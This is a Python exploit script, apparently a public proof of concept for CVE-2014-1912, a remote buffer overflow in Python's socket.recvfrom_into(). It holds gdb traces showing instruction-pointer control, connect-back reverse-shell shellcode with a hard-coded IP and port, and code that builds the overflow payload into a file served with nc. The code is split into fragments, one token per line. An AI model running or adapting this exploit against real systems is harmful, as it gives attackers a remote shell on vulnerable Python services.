#!/usr/bin/env python
'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912
socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder
TODO: rop to evade stack nx
(gdb) x/i $eip
=> 0x817bb28: mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol
0x817bb2b: test BYTE PTR [eax+0x55],0x40
0x817bb2f: jne 0x817bb38 -->
...
0x817bb38: mov eax,DWORD PTR [eax+0xa4] <--- eax full control again
0x817bb3e: test eax,eax
0x817bb40: jne 0x817bb58 -->
...
0x817bb58: mov DWORD PTR [esp],ebx
0x817bb5b: call eax <--------------------- indirect fucktion call ;)
$ ./pyrecvfrominto.py
egg file generated
$ cat egg | nc -l 8080 -vv
... when client connects ... or wen we send the evil buffer to the server ...
0x0838591c in ?? ()
1: x/5i $eip
=> 0x838591c: int3 <--------- LANDED!!!!!
0x838591d: xor eax,eax
0x838591f: xor ebx,ebx
0x8385921: xor ecx,ecx
0x8385923: xor edx,edx
'''
import
struct
def
off(o):
return
struct.pack(
'L'
,o)
reverseIP
=
'\xc0\xa8\x04\x34'
#'\xc0\xa8\x01\x0a'
reversePort
=
'\x7a\x69'
#shellcode from exploit-db.com, (remove the sigtrap)
shellcode
=
"\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
\
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
\
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
\
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
+
\
reverseIP
+
"\x66\x68"
+
reversePort
+
"\x66\x53\xfe"
\
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
\
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
\
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
\
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
\
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
\
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
\
"\x80"
shellcode_sz
=
len
(shellcode)
print
'shellcode sz %d'
%
shellcode_sz
ebx
=
0x08385908
sc_off
=
0x08385908
+
20
padd
=
'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'
'''
+------------+----------------------+ +--------------------+
| | | | |
V | | V |
'''
buff
=
'aaaa'
+
off(ebx)
+
'aaaaaAAA'
+
off(ebx)
+
shellcode
+
padd
+
off(sc_off)
# .. and landed ;)
print
'buff sz: %s'
%
len
(buff)
open
(
'egg'
,
'w'
).write(buff)